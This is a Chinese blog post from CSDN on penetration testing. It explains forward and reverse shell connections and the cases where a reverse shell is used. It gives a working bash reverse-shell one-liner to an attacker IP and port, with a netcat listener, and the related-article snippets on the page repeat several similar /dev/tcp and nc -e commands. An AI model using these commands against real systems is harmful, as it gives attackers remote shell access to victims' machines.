利用bash反弹shell

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量1.3k 收藏 1
点赞数 3
分类专栏: 漏洞利用 文章标签: shell linux 安全 渗透测试 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WZZ_2363173126/article/details/116151124
版权

正向连接与反向连接

       与目标主机建立连接的原理利用漏洞执行ShellCode
       GetShell的实质是:执行ShellCode,将目标主机的Shell重定向到攻击机。拿到Shell利于后续的渗透。
       所谓的反弹Shell是指GetShell的过程由目标主机主动发起(反向连接)。

正向连接

  • 攻击机:主动向目标机发起连接,并将其命令行的输入输出转到攻击机。
  • 目标机:攻击者通过攻击打开目标机的某个端口,目标机在该端口响应攻击机的连接。

反向连接

  • 攻击机:监听本机的某个端口,等待远程连接。
  • 目标机:主动向攻击机发起到攻击机的监听端口的连接,并将其命令行的输入输出转到攻击机。

反弹shell适用场景

  • 目标机受到防火墙的限制,不能接收连接请求。
  • 目标机位于局域网,攻击机无法直接连接。
  • 木马的连接方式通常都是反向连接。

利用bash反弹shell示例

  • 攻击机IP:172.17.0.1
  • 攻击机端口:2333

攻击机开启本地监听

       攻击机开启对本地端口2333的监听。

nc -lvp 2333

利用bash反弹shell

       利用漏洞执行反弹shell的命令。
       从攻击机向攻击机的2333端口发起连接,并将bash的输入与输出重定向到攻击机。

/bin/bash -i > /dev/tcp/172.17.0.1/2333 0<&1 2>&1
Dennis F
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shell
qq_51577576的博客
09-04 837
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shell bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2
linux-ReverseShellasaService反弹shell即服务
08-13
4. **脚本语言**:Python、Perl、Bash等脚本语言常被用于创建反弹shell,因为它们灵活且易于编写。 5. **Payload生成**:攻击者可能需要生成特定的shellcode或利用,以在目标系统上创建反弹shell。这可能涉及到对二...
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1692
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
浅析Linuxbash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 1003
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
Linuxbash反弹shell原理浅析
热门推荐
Au
04-07 1万+
环境 攻击机:kali ip:192.168.25.144 靶 机:centos ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 ...
【转】Linuxbash反弹shell原理浅析
mastergu2的博客
11-04 2217
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
Linux反弹shell姿势复现(一)--- 利用bash反弹shell
weixin_44283446的博客
03-23 3036
反弹shell姿势复现(一)前言复现环境说明反弹shell姿势(一)--- 利用bash反弹shell重要说明方法一方法二 前言     反弹shell有很多种方式,这个系列内容较多,之后也会不断更新,对于反弹shell复现也算是一个近期工作的归纳总结吧。     注意:本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! 复现环境说明 我在ubuntu和centos上均做了复现,用于比较版本对反弹shell的影响
linux反弹shell的原理详解
01-08
利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是...
bunny_payloads:Bash兔子很有趣!
01-31
在IT行业中,Bash是一种广泛使用的命令行解释器,它基于Unix系统,包括Linux和macOS。"Bash兔子很有趣!...通过探索这个项目,用户可以了解如何利用Bash的强大功能,甚至将其应用到自己的工作流程中。
BASH-pong_game:著名的游戏
06-28
开发者必须利用Bash的输出控制、流程控制和条件判断等特性来模拟游戏逻辑和交互。 在压缩包文件名称列表中,我们看到"BASH-pong_game-master",这通常代表了项目的主分支或者是最完整的版本。"master"分支在Git版本...
各种shell反弹方法
weixin_46626737的博客
05-16 2654
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
Linux反弹Shell
m0_73199983的博客
03-06 1282
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)
weixin_43803070的博客
07-10 2155
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境: CentOS 6.5:192.168...
带你读懂bash一句话反弹shell
qq_42303523的博客
02-22 1866
需要知道的linux知识 标准输入、标准输出、标准错误 在linux中输入一条命令会打开三个文件:标准输入、标准输出、标准错误。 在任何时候这个进程希望读取东西的时候都会从它的标准输入进行读取,在任何时候这个进程有输出的时候都会写入到标准输出,在任何时候这个进程有错误信息的时候都会写入到标准错误。 重定向 一般情况下,标准输入都是键盘,标准输出和标准错误都是显示器。 所谓的重定向,就是修改标准输入、标准输出、标准错误的读取或写入的对象。 常用的重定向操作符号有以下几个: 命令 说明 comm
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 1616
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反向 shell
lyyslsw的专栏
12-27 639
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
反向shell
钱国正的专栏
10-21 649
参考链接客户端执行0<&196;exec 196<>/dev/tcp/<你的IP>/<相同的端口>; sh <&196 >&196 2>&196服务器端执行nc -l -p <任何未封锁的端口> -vvv
bash反弹shell
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值